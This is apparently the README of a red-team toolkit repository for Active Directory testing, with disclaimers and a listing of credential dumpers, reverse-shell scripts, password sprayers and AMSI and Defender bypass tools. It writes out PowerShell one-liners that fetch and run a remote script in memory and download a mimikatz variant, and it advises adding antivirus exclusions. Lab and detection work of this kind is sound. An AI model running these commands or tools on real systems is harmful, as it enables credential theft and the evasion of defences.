A curated toolkit of utilities, executables, PowerShell scripts, DLLs, and reference notes gathered to support Active Directory research, red teaming lab work, and defensive testing in isolated environments.
This repository contains offensive security tools and potentially dangerous binaries. Use only in environments you own or where you have explicit written authorization. Do not run these tools on production systems, customer networks, or any environment where you lack permission. Follow all applicable laws, organizational policies, and responsible disclosure practices.
Run everything in a safe, isolated lab (e.g., air-gapped VMs, snapshots you can revert) and verify file integrity (hashes, vendor/source) before execution.
To get started with the RedForest Toolkit, follow these steps:
Since this repository relies on multiple sub-projects and external modules, a standard clone is not enough. Ensure you fetch everything by using the --recursive flag:
git clone --recursive https://github.com/RealFadyMoheb/RedForest-Toolkit.git- Isolated Lab: Always run these tools in a dedicated, non-connected lab environment.
- Exclusions: You may need to add AV/EDR exclusions for the toolkit directory, as many of these tools are flagged by design.
- Dependencies: Check the
Python/andPowerShell/directories for specific script requirements (e.g.,pip installfor Impacket modules).
For quick deployment during testing, you can load PowerShell scripts directly into memory or download executables using the following PowerShell commands:
Import a PowerShell script (e.g., Get-LAPSPermissions):
iex (New-Object Net.Webclient).DownloadString("https://raw.githubusercontent.com/RealFadyMoheb/RedForest-Toolkit/main/PowerShell/Get-LAPSPermissions.ps1")Download an executable (e.g., BetterSafetyKatz):
(New-Object Net.WebClient).DownloadFile("https://raw.githubusercontent.com/RealFadyMoheb/RedForest-Toolkit/main/EXE/BetterSafetyKatz.exe", "C:\Windows\Temp\BetterSafetyKatz.exe")Navigate through the categorized folders (EXE, PowerShell, dlls, etc.) to find the tools relevant to your current research or testing objective.
- dlls/
- libeay32.dll
- PowerShdll_x64.dll
- PowerShdll_x86.dll
- SeBackupPrivilegeCmdLets.dll
- SeBackupPrivilegeUtils.dll
- ssleay32.dll
- EXE/
- BetterSafetyKatz.exe
- bypass-clm.exe
- DefenderSwitch.exe
- Farmer.exe
- Fertiliser.exe
- GoldenGMSA.exe
- HarvestCrop.exe
- Hello.exe
- Hello_Bypass.exe
- hfs.exe
- LaZagne.exe
- Loader.exe
- MDE_Enum.exe
- mimikatz-x64.exe
- mimikatz-win32.exe
- MS-RPRN.exe
- nc64.exe
- NimExec.exe
- Power_Bypass.exe
- RawCopy.exe
- RawCopy64.exe
- Rubeus.exe
- SafetyKatz.exe
- SandboxDefender.exe
- sqlcmd.exe
- SQLRecon.exe
- Sysmon.exe
- Sysmon64.exe
- Transcription_Bypass.exe
- Watson.exe
- Whisker.exe
- SharpChrome.exe
- SharpDPAPI.exe
- SharpSecDump.exe
- SharpUserIP.exe
- Snaffler.exe
- hfs.exe
- ntfsDump.exe
- SharpRDP.exe
- CleanRunMRU.exe
- RemoteSessionEnum.exe
- SharpView.exe
- adfind.exe
- ADExplorer64.exe
- PowerShell/
- ADACLScan.ps1
- adconnect.ps1
- ASREPRoast.ps1
- CIPolicyParser.ps1
- defender.ps1
- DomainPasswordSpray.ps1
- EnableAllTokenPrivs.ps1
- Envrandomizer.ps1
- ExpandDefenderSig.ps1
- Find-PSRemotingLocalAdminAccess.ps1
- Find-WMILocalAdminAccess.ps1
- Get-LAPSPermissions.ps1
- Get-MSSQLLinkPasswords.psm1
- Import-ActiveDirectory
- Inveigh.ps1
- Invoke-ADSDPropagation.ps1
- Invoke-DCSync.ps1
- Invoke-EDRChecker.ps1
- Invoke-Encode.ps1
- Invoke-GMSAPasswordReader.ps1
- Invoke-HoneypotBuster.ps1
- Invoke-Mimi.ps1
- Invoke-Mimikatz.ps1
- Invoke-Mimikatz_old.ps1
- Invoke-noPac.ps1
- Invoke-Phant0m.ps1
- Invoke-PowerShellTcp.ps1
- Invoke-PowerShellTcpEx.ps1
- Invoke-PowerShellTcpOneLine.ps1
- Invoke-PowerShellTcp_Old.ps1
- Invoke-SDPropagator.ps1
- Invoke-SDPropagator.ps1.1
- Invoke-SessionHunter.ps1
- Invoke-SharpDPAPI.ps1
- Invoke-SqlServer-Persist-StartupSp.psm1
- jaws-enum.ps1
- Nikhil_rev.ps1
- Old_PowerView.ps1
- powercat.ps1
- PowerGPOAbuse.ps1
- Powermad.ps1
- PowerUpSQL.ps1
- PowerUp_Old.ps1
- PowerView.ps1
- Pre2kSpray.ps1
- PrivescCheck.ps1
- PSUpload.ps1
- RACE.ps1
- ServerUntrustAccount.ps1
- SessionGopher.ps1
- Set-DCShadowPermissions.ps1
- Set-TokenPrivilege.ps1
- SharpHound.ps1
- winPEAS.ps1
- Invoke-SharpSecDump.ps1
- SpoolerScan.ps1
- Invoke-NinjaCopy.ps1
- UnderlayCopy.ps1
- Find-LocalAdminAccess.ps1
- PatchRDP.ps1
- Python/
- Impacket
- PowerView.py
- LdapRelayScan.py
- txt/
- Amsi.txt
- sbloggingbypass.txt
- Research & learning: quick access to binaries and scripts commonly referenced in AD research and red-team demos.
- Lab work: reproduce scenarios in isolated test domains to learn detection and mitigation.
- Defensive development: defenders can use these artifacts (in a safe lab) to validate detections, telemetry, and alerting logic.
This repository is provided AS IS for research, education, and defensive testing only. The maintainers are not responsible for misuse. By using these materials you agree to comply with applicable laws and ethical guidelines. Consider adding a specific license file (e.g., MIT, or a responsible-use / prohibited-use clause) that matches your intent.
